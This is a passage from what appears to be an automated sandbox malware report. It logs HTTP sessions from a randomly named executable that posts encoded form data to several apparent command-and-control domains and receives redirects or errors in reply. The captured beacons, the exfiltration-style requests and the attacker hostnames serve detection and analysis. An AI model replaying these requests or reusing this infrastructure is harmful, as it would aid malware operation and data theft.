                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 62 54 69 68 36 50 48 78 38 5a 66 73 51 56 64 68 6b 78 72 2f 70 34 31 73 64 6b 6e 59 37 42 78 2b 56 44 2f 51 37 64 62 76 39 39 72 30 6e 6e 33 5a 57 52 2f 51 59 48 47 64 66 71 69 38 2f 36 38 4c 74 33 38 30 35 7a 6d 48 39 77 70 66 68 59 32 7a 4f 6e 6d 59 77 2f 61 6a 66 4c 50 63 6f 2f 6e 41 38 4e 31 78 6f 4d 41 43 6a 79 5a 56 7a 50 46 75 4f 64 47 6e 6d 4f 77 2f 45 6a 6d 69 53 35 57 39 30 36 33 67 4d 31 36 41 68 4f 38 70 4d 30 2b 37 44 72 6f 48 41 7a 55 43 78 5a 51 68 76 4a 78 47 6a 39 55 52 65 42 30 30 76 45 45 2f 56 65 46 58 39 30 37 33 32 67 3d 3d
                                                                                    Data Ascii: 6B-l7F=r2nTWKLo591VbTih6PHx8ZfsQVdhkxr/p41sdknY7Bx+VD/Q7dbv99r0nn3ZWR/QYHGdfqi8/68Lt3805zmH9wpfhY2zOnmYw/ajfLPco/nA8N1xoMACjyZVzPFuOdGnmOw/EjmiS5W9063gM16AhO8pM0+7DroHAzUCxZQhvJxGj9UReB00vEE/VeFX90732g==
                                                                                    Jan 9, 2025 16:56:33.688316107 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    38 | 192.168.11.30 | 49862 | 13.248.169.48 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:56:36.223210096 CET | 834 | OUT | POST /kgjj/ HTTP/1.1
                                                                                    Host: www.nextlevel.finance
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.nextlevel.finance
                                                                                    Referer: http://www.nextlevel.finance/kgjj/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 55 53 53 68 70 2b 48 78 70 70 66 76 56 56 64 68 74 52 71 34 70 34 70 73 64 6c 54 49 37 54 46 2b 57 6a 50 51 36 5a 33 76 38 39 72 30 7a 58 33 41 59 78 2f 48 59 48 4b 56 66 76 43 38 2f 38 51 4c 74 79 51 30 2b 41 2b 49 2b 41 70 64 70 34 32 31 44 48 6d 59 77 2f 61 6a 66 4c 62 6d 6f 2f 76 41 2f 2b 74 78 75 5a 38 42 74 53 5a 61 30 50 46 75 45 39 47 6a 6d 4f 77 42 45 6e 2f 31 53 37 75 39 30 34 76 67 4d 6b 36 44 36 2b 38 6e 52 6b 2b 6f 4d 4f 52 2f 65 41 73 47 78 72 63 42 76 37 56 54 69 71 35 4c 44 43 41 32 38 6b 34 53 4a 66 6f 2f 2f 32 36 73 72 68 51 59 5a 55 51 61 73 72 5a 39 55 6a 79 6a 30 66 71 41 68 61 30 3d
                                                                                    Data Ascii: 6B-l7F=r2nTWKLo591VUSShp+HxppfvVVdhtRq4p4psdlTI7TF+WjPQ6Z3v89r0zX3AYx/HYHKVfvC8/8QLtyQ0+A+I+Apdp421DHmYw/ajfLbmo/vA/+txuZ8BtSZa0PFuE9GjmOwBEn/1S7u904vgMk6D6+8nRk+oMOR/eAsGxrcBv7VTiq5LDCA28k4SJfo//26srhQYZUQasrZ9Ujyj0fqAha0=
                                                                                    Jan 9, 2025 16:56:36.359236002 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    39 | 192.168.11.30 | 49863 | 13.248.169.48 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:56:39.909548998 CET | 1289 | OUT | POST /kgjj/ HTTP/1.1
                                                                                    Host: www.nextlevel.finance
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.nextlevel.finance
                                                                                    Referer: http://www.nextlevel.finance/kgjj/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 55 53 53 68 70 2b 48 78 70 70 66 76 56 56 64 68 74 52 71 34 70 34 70 73 64 6c 54 49 37 54 64 2b 57 51 33 51 36 34 33 76 36 4e 72 30 77 58 33 46 59 78 2f 2f 59 44 75 52 66 76 65 73 2f 2f 6b 4c 69 30 45 30 37 78 2b 49 6c 51 70 64 32 6f 32 77 4f 6e 6d 33 77 35 36 2f 66 4c 4c 6d 6f 2f 76 41 2f 34 42 78 34 38 41 42 76 53 5a 56 7a 50 46 79 4f 64 47 50 6d 4b 6b 33 45 6e 71 49 53 35 4f 39 30 4a 2f 67 4c 58 53 44 36 2b 38 6e 4c 30 2b 72 4d 4f 56 79 65 41 6b 53 78 75 70 2b 76 4c 78 54 68 50 6f 4f 57 79 46 73 76 6b 6f 50 4f 4d 6b 33 72 58 43 50 6a 44 51 67 49 6e 49 44 69 71 5a 58 64 48 71 71 70 61 75 44 30 2f 46 47 6b 44 43 51 4f 71 78 61 42 6e 52 47 75 6f 42 4b 67 69 64 54 75 4a 79 4b 54 53 64 33 43 54 79 30 4d 73 46 72 48 67 6a 62 53 70 71 42 2b 76 2f 44 61 66 45 4f 7a 4a 66 67 64 71 2f 6e 75 41 63 57 57 4c 71 4f 4c 44 6c 34 65 74 74 78 79 39 56 45 78 43 6a 37 6c 32 31 36 6c 46 6c 45 75 37 55 44 4d 61 4d 64 76 38 55 36 4a 31 4a 67 69 41 30 47 47 48 47 [TRUNCATED]
                                                                                    Jan 9, 2025 16:56:39.909611940 CET  2662               OUT        Data Raw: 32 38 6a 6e 45 61 42 6b 32 79 68 70 55 71 43 33 55 30 67 46 41 7a 44 63 64 5a 53 38 7a 6d 78 78 44 55 58 63 48 2f 4d 41 44 77 57 77 6f 62 4f 49 34 62 75 76 43 32 5a 63 49 52 50 6d 50 67 38 56 70 4c 70 45 36 45 76 79 2f 66 50 4d 55 70 4d 4e 38 6f
                                                                                    Data Ascii: 28jnEaBk2yhpUqC3U0gFAzDcdZS8zmxxDUXcH/MADwWwobOI4buvC2ZcIRPmPg8VpLpE6Evy/fPMUpMN8oIyeFzKD1TgXrX+qW/kimRl5HqP97EOCSdA8C5BWNq3BdDJ+an3ckGMubn4hXwHVbhpvHfa3SLZEOjwm8mK3d8e7ZVwC8Rous/lYeskzyOLrdJ1mWvsvlFOWmQ1V/KbbkLAxsP+sOD5uLKAVbd0++VOSyBjvTVpH3Q
                                                                                    Jan 9, 2025 16:56:40.046780109 CET  73                 IN         HTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    40          192.168.11.30  49864        13.248.169.48   80                5384  C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                           Bytes transferred  Direction  Data
                                                                                    Jan 9, 2025 16:56:42.578635931 CET  540                OUT        GET /kgjj/?6B-l7F=m0PzV+DL9MdhQie9ia/fmr3XBWpQsDf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZafkuM6Gl/4SxdxZjgo=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.nextlevel.finance
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:56:42.719249010 CET  379                IN         HTTP/1.1 200 OK
                                                                                    content-type: text/html
                                                                                    date: Thu, 09 Jan 2025 15:56:42 GMT
                                                                                    content-length: 258
                                                                                    connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 42 2d 6c 37 46 3d 6d 30 50 7a 56 2b 44 4c 39 4d 64 68 51 69 65 39 69 61 2f 66 6d 72 33 58 42 57 70 51 73 44 66 2f 6c 6f 74 59 55 58 2b 41 68 6a 4d 6f 51 41 37 46 33 4b 33 46 6a 50 76 38 6b 56 2f 51 42 77 2f 50 64 55 2f 4f 58 4d 2f 72 69 2f 49 62 72 46 59 47 34 78 79 70 69 41 42 77 6e 61 53 57 52 45 47 55 33 75 75 37 5a 61 66 6b 75 4d 36 47 6c 2f 34 53 78 64 78 5a 6a 67 6f 3d 26 38 30 6b 3d 6c 52 61 70 43 50 4d 58 67 44 6b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6B-l7F=m0PzV+DL9MdhQie9ia/fmr3XBWpQsDf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZafkuM6Gl/4SxdxZjgo=&80k=lRapCPMXgDk"}</script></head></html>


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    41          192.168.11.30  49865        103.106.67.112  80                5384  C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                           Bytes transferred  Direction  Data
                                                                                    Jan 9, 2025 16:56:48.182256937 CET  799                OUT        POST /k29t/ HTTP/1.1
                                                                                    Host: www.furrcali.xyz
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.furrcali.xyz
                                                                                    Referer: http://www.furrcali.xyz/k29t/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 31 75 48 2f 38 50 70 72 50 6b 36 49 7a 6c 42 37 32 78 71 35 53 7a 70 78 31 6b 42 31 4e 75 58 58 52 42 49 7a 78 64 52 31 38 77 6d 67 6a 57 45 48 75 36 4d 73 4f 5a 43 39 6c 41 34 5a 67 56 39 56 31 58 6f 36 52 54 36 54 54 2f 58 51 5a 43 4d 62 2b 2b 41 71 67 50 4e 59 30 75 76 41 41 6f 65 52 75 54 4c 63 50 54 2b 38 61 77 44 4f 63 52 78 59 69 6d 44 54 47 43 6d 77 4a 4e 79 52 53 6a 45 6b 36 78 4f 66 35 44 73 72 6e 6e 79 6a 75 59 4d 36 6f 36 7a 6e 38 78 33 43 4d 4d 30 33 58 34 39 61 5a 43 78 4a 51 52 35 35 5a 66 33 56 66 65 56 74 69 50 65 2f 51 3d 3d
                                                                                    Data Ascii: 6B-l7F=rJkYOGdVVG3na1uH/8PprPk6IzlB72xq5Szpx1kB1NuXXRBIzxdR18wmgjWEHu6MsOZC9lA4ZgV9V1Xo6RT6TT/XQZCMb++AqgPNY0uvAAoeRuTLcPT+8awDOcRxYimDTGCmwJNyRSjEk6xOf5DsrnnyjuYM6o6zn8x3CMM03X49aZCxJQR55Zf3VfeVtiPe/Q==
                                                                                    Jan 9, 2025 16:56:48.438275099 CET  242                IN         HTTP/1.1 302 Found
                                                                                    Location: https://www.furrcali.xyz/k29t/
                                                                                    Server: Dynamic Http Server
                                                                                    X-Ratelimit-Limit: 101
                                                                                    X-Ratelimit-Remaining: 100
                                                                                    X-Ratelimit-Reset: 1
                                                                                    Date: Thu, 09 Jan 2025 15:56:48 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    42          192.168.11.30  49867        103.106.67.112  80                5384  C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                           Bytes transferred  Direction  Data
                                                                                    Jan 9, 2025 16:56:50.896884918 CET  819                OUT        POST /k29t/ HTTP/1.1
                                                                                    Host: www.furrcali.xyz
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.furrcali.xyz
                                                                                    Referer: http://www.furrcali.xyz/k29t/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 52 53 48 7a 2f 58 70 75 76 6b 35 52 44 6c 42 79 57 78 75 35 53 2f 70 78 30 51 52 31 37 57 58 58 77 78 49 79 77 64 52 67 38 77 6d 30 7a 58 76 59 2b 36 44 73 4f 56 6b 39 6c 4d 34 5a 67 78 39 56 30 6e 6f 36 69 37 35 51 6a 2f 52 64 35 43 4f 52 65 2b 41 71 67 50 4e 59 30 36 46 41 41 41 65 53 64 37 4c 66 75 54 39 32 36 77 41 48 38 52 78 4b 53 6d 50 54 47 43 59 77 4e 46 63 52 51 72 45 6b 2b 31 4f 66 73 2f 72 77 33 6e 6f 74 4f 5a 6a 2f 70 71 35 6f 49 42 6b 53 64 73 2f 76 32 77 31 66 4f 76 72 55 54 6c 37 71 35 6a 61 4a 65 7a 39 76 67 4f 46 69 56 73 5a 34 7a 58 73 66 58 77 4a 76 4d 62 6b 63 6a 47 69 4b 5a 6b 3d
                                                                                    Data Ascii: 6B-l7F=rJkYOGdVVG3naRSHz/Xpuvk5RDlByWxu5S/px0QR17WXXwxIywdRg8wm0zXvY+6DsOVk9lM4Zgx9V0no6i75Qj/Rd5CORe+AqgPNY06FAAAeSd7LfuT926wAH8RxKSmPTGCYwNFcRQrEk+1Ofs/rw3notOZj/pq5oIBkSds/v2w1fOvrUTl7q5jaJez9vgOFiVsZ4zXsfXwJvMbkcjGiKZk=
                                                                                    Jan 9, 2025 16:56:51.152040005 CET  242                IN         HTTP/1.1 302 Found
                                                                                    Location: https://www.furrcali.xyz/k29t/
                                                                                    Server: Dynamic Http Server
                                                                                    X-Ratelimit-Limit: 101
                                                                                    X-Ratelimit-Remaining: 100
                                                                                    X-Ratelimit-Reset: 1
                                                                                    Date: Thu, 09 Jan 2025 15:56:51 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    43          192.168.11.30  49868        103.106.67.112  80                5384  C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                           Bytes transferred  Direction  Data
                                                                                    Jan 9, 2025 16:56:53.626156092 CET  3936               OUT        POST /k29t/ HTTP/1.1
                                                                                    Host: www.furrcali.xyz
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.furrcali.xyz
                                                                                    Referer: http://www.furrcali.xyz/k29t/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 52 53 48 7a 2f 58 70 75 76 6b 35 52 44 6c 42 79 57 78 75 35 53 2f 70 78 30 51 52 31 37 65 58 57 47 46 49 79 58 4a 52 6d 4d 77 6d 33 7a 57 49 59 2b 36 61 73 4b 35 67 39 6c 52 4e 5a 69 35 39 55 57 76 6f 72 6a 37 35 48 54 2f 52 42 4a 43 4c 62 2b 2b 52 71 6b 54 42 59 30 71 46 41 41 41 65 53 62 48 4c 4a 50 54 39 77 36 77 44 4f 63 52 39 59 69 6d 72 54 47 61 58 77 4e 42 69 52 54 4c 45 6b 4a 70 4f 66 65 58 72 77 33 6e 6f 67 75 5a 6d 2f 70 6d 36 6f 49 35 77 53 63 55 76 76 6e 55 31 66 71 65 4e 49 68 31 65 32 4b 62 42 55 4d 4c 35 6e 44 6a 62 6d 32 70 38 33 43 61 53 57 69 4a 70 71 71 54 73 4c 69 4b 33 51 4d 36 4f 38 4b 4c 6a 61 32 39 73 32 31 43 4e 6e 46 5a 68 48 70 71 31 61 50 65 7a 76 64 52 42 78 41 72 30 71 55 59 2b 6f 4c 59 2f 65 77 42 58 53 65 2b 52 44 76 4b 72 57 46 5a 48 7a 76 41 51 6a 6e 58 52 7a 43 43 75 46 4a 72 7a 53 74 5a 31 56 4e 4a 6b 54 6a 57 66 37 47 64 59 45 6a 7a 49 37 45 37 4c 50 38 36 77 2b 33 73 56 54 44 45 41 4b 51 59 61 69 43 34 [TRUNCATED]
                                                                                    Jan 9, 2025 16:56:53.880795956 CET  242                IN         HTTP/1.1 302 Found
                                                                                    Location: https://www.furrcali.xyz/k29t/
                                                                                    Server: Dynamic Http Server
                                                                                    X-Ratelimit-Limit: 101
                                                                                    X-Ratelimit-Remaining: 100
                                                                                    X-Ratelimit-Reset: 1
                                                                                    Date: Thu, 09 Jan 2025 15:56:53 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    44          192.168.11.30  49869        103.106.67.112  80                5384  C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                           Bytes transferred  Direction  Data
                                                                                    Jan 9, 2025 16:56:56.329521894 CET  535                OUT        GET /k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaXyxOjElLsGmAN2m/Z8=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.furrcali.xyz
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:56:56.584871054 CET  629                IN         HTTP/1.1 302 Found
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Location: https://www.furrcali.xyz/k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaXyxOjElLsGmAN2m/Z8=&80k=lRapCPMXgDk
                                                                                    Server: Dynamic Http Server
                                                                                    X-Ratelimit-Limit: 101
                                                                                    X-Ratelimit-Remaining: 100
                                                                                    X-Ratelimit-Reset: 1
                                                                                    Date: Thu, 09 Jan 2025 15:56:56 GMT
                                                                                    Content-Length: 201
                                                                                    Connection: close
                                                                                    Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 75 72 72 63 61 6c 69 2e 78 79 7a 2f 6b 32 39 74 2f 3f 36 42 2d 6c 37 46 3d 6d 4c 4d 34 4e 79 56 33 52 6d 37 4c 53 46 36 78 2f 61 33 76 70 73 30 75 52 55 56 37 7a 45 6b 66 6c 43 2f 63 77 58 39 58 78 39 65 44 51 42 4a 37 2f 67 4e 74 35 39 63 75 6a 67 4c 57 47 65 79 67 70 64 73 48 75 48 51 36 5a 54 31 6e 5a 45 65 45 36 41 7a 71 50 44 44 4d 52 6f 36 58 47 70 75 44 31 58 48 69 61 58 79 78 4f 6a 45 6c 4c 73 47 6d 41 4e 32 6d 2f 5a 38 3d 26 61 6d 70 3b 38 30 6b 3d 6c 52 61 70 43 50 4d 58 67 44 6b 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                    Data Ascii: <a href="https://www.furrcali.xyz/k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaXyxOjElLsGmAN2m/Z8=&amp;80k=lRapCPMXgDk">Found</a>.


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    45          192.168.11.30  49870        104.21.32.1     80                5384  C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                           Bytes transferred  Direction  Data
                                                                                    Jan 9, 2025 16:57:01.860265017 CET  811                OUT        POST /w98i/ HTTP/1.1
                                                                                    Host: www.buyspeechst.shop
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.buyspeechst.shop
                                                                                    Referer: http://www.buyspeechst.shop/w98i/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 72 52 6d 59 52 45 66 59 6a 55 34 4b 30 33 6e 2f 39 76 62 66 43 6a 35 71 49 6a 4b 6c 4f 46 31 62 7a 75 55 74 67 39 42 7a 7a 46 6b 30 49 7a 48 6b 6b 4f 45 4e 4d 70 2f 31 37 4b 58 4f 42 35 69 65 52 35 51 52 43 32 4a 75 6e 75 37 6e 4c 6f 37 50 67 66 38 64 38 30 73 79 6e 72 61 52 65 2f 49 67 47 64 6b 67 75 57 4c 38 38 71 57 62 70 31 56 4a 70 62 6d 43 43 75 6c 58 6d 6f 6e 48 68 41 63 49 51 53 30 74 32 42 4a 4f 77 6a 56 74 43 50 72 6b 4d 35 64 4a 36 37 4a 2f 2f 74 77 30 39 58 63 72 53 54 2b 75 4a 47 5a 71 76 48 61 35 7a 75 33 38 6c 6d 70 77 77 3d 3d
                                                                                    Data Ascii: 6B-l7F=ZdYnZ6+WLY4YYrRmYREfYjU4K03n/9vbfCj5qIjKlOF1bzuUtg9BzzFk0IzHkkOENMp/17KXOB5ieR5QRC2Junu7nLo7Pgf8d80synraRe/IgGdkguWL88qWbp1VJpbmCCulXmonHhAcIQS0t2BJOwjVtCPrkM5dJ67J//tw09XcrST+uJGZqvHa5zu38lmpww==
                                                                                    Jan 9, 2025 16:57:02.222666979 CET  1048               IN         HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:57:02 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ro8%2BRdHQnVliNe7E5davoxQTs2cygGkkW9VFtFoOHfMhs8cUYRTOd2FRiLEzR2vOuZFGqLFUprke5iUZuh8pBPwTtJ1JkCtkeZiTDPAal%2FREEjgyvJMsdBNw2BT1GGSyxwzbUJUyWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59ee708b262d6-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=119019&min_rtt=119019&rtt_var=59509&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a
                                                                                    Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_
                                                                                    Jan 9, 2025 16:57:02.222676039 CET  21                 IN         Data Raw: 62 0d 0a e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: b+0


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    46          192.168.11.30  49871        104.21.32.1     80                5384  C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                           Bytes transferred  Direction  Data
                                                                                    Jan 9, 2025 16:57:04.508842945 CET  831                OUT        POST /w98i/ HTTP/1.1
                                                                                    Host: www.buyspeechst.shop
